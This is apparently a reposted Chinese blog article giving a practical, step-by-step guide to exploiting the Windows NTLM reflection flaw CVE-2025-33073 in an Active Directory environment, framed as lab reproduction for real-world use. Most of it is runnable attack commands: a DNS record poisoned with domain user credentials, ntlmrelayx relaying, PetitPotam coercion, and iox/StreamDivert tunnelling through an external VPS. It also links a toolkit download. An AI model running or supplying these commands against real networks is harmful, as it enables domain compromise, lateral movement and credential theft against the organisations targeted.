-
靶场复现中存在的 Windows 端口占用问题在实战中没有太大影响,因为不可避免的需要走隧道进行利用,那么外网的 VPS 机器直接选择 Linux 即可。如果确实有需要用到 Windows 进行利用的情况,按照章节 0x04 中不出网的部分进行转发即可。为了帮助小白更好的理解,文章最后也会对其单独进行讲解。 -
为了使流程更加清晰,文中按照步骤搭建不同的隧道,实战情况下可以使用 frp 等能转发 SMB 的工具进行转发,简化利用流程并减少文件上传的数量。
内网横行:CVE-2025-33073漏洞分析与攻击复现 薛定的饿猫,公众号:饿猫的小黑屋内网横行:CVE-2025-33073漏洞分析与攻击复现
域控DC Windows server 2022:192.168.214.134域内目标主机 Windows server 2022:192.168.214.135外网主机 Windows server 2022192.168.214.136192.168.56.130(模拟外网IP) 攻击机 Windows 11:192.168.56.131公网VPS Kali Linux:192.168.56.129
python dnstool.py -u luckytom.comdomainuser01 -p User01!@# -r badtom1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.214.130 --action modify 192.168.214.134
python ntlmrelayx.py -t 192.168.214.135 -smb2support
python PetitPotam.py -d luckytom.com -u domainuser01 -p User01!@# badtom1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 192.168.214.135
1. 攻击者在域控上添加一条精心构造的 DNS 记录,将主机名 badtom1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 指向攻击者的 IP 192.168.214.1382. 攻击者在内网跳板机(不必在域内,网络连通即可)上启动 SMB/LDAP 等协议的监听,接收到目标主机发起的 NTLM 认证请求后将其反射回目标主机3. 强制目标主机向 badtom1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 发起 NTLM 认证3. 目标主机向域控查询 badtom1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 的 A 记录,并解析到 IP 192.168.214.1384. 目标主机向攻击者(192.168.214.138)发起 NTLM 认证请求5. 攻击者将收到的认证请求反射回目标主机6. 目标主机触发漏洞进行本地身份验证7. 在本地身份验证握手中,攻击者监听到有 Token 的上下文句柄,并提取 Hash
1. Windows 445 端口占用2. 相关利用脚本均依赖impacket
已获得普通域用户:domainuser01 / User01!@#域控DC Windows server 2022:192.168.214.134域内目标主机 Windows server 2022:192.168.214.135入口跳板主机 Windows server 2022192.168.214.136192.168.56.130 (模拟外网IP) 攻击机 Windows 11:192.168.56.131公网VPS Kali Linux:192.168.56.129
iox.exe proxy -l 8080
python dnstool.py -u luckytom.comdomainuser01 -p User01!@# -r badtom1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.214.137 --action modify 192.168.214.134 --tcp# 这里必须加 --tcp 参数将 UDP 封装在 TCP中进行 DNS 查询
python ntlmrelayx.py -t 192.168.214.135 -smb2support
python PetitPotam.py -d luckytom.com -u domainuser01 -p User01!@# badtom1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 192.168.214.135
iox.exe proxy -l 8080
python dnstool.py -u luckytom.comdomainuser01 -p User01!@# -r badtom1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.214.130 --action modify 192.168.214.134 --tcp# 这里必须加 --tcp 参数将 UDP 封装在 TCP中进行 DNS 查询
proxychains python3 ntlmrelayx.py -t 192.168.214.135 -smb2support
tcp < 445 0.0.0.0 -> 192.168.56.129 445
5. 加载配置文件启动转发:
shell StreamDivert.exe config.txt
python PetitPotam.py -d luckytom.com -u domainuser01 -p User01!@# badtom1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 192.168.214.135
https://mp.weixin.qq.com/s/NrGyltW-f8a3Zqr0-4oYnw
工具集下载地址
通过网盘分享的文件:CVE-2025-33073.zip
链接: https://pan.baidu.com/s/1nUapUZaxi7yO_K0TCDp7og?pwd=8imv 提取码: 8imv 复制这段内容后打开百度网盘手机App,操作更方便哦
--来自百度网盘超级会员v9的分享
原文始发于微信公众号(进击的小K):内网横行:CVE-2025-33073 实战场景利用全流程指南 | 附利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论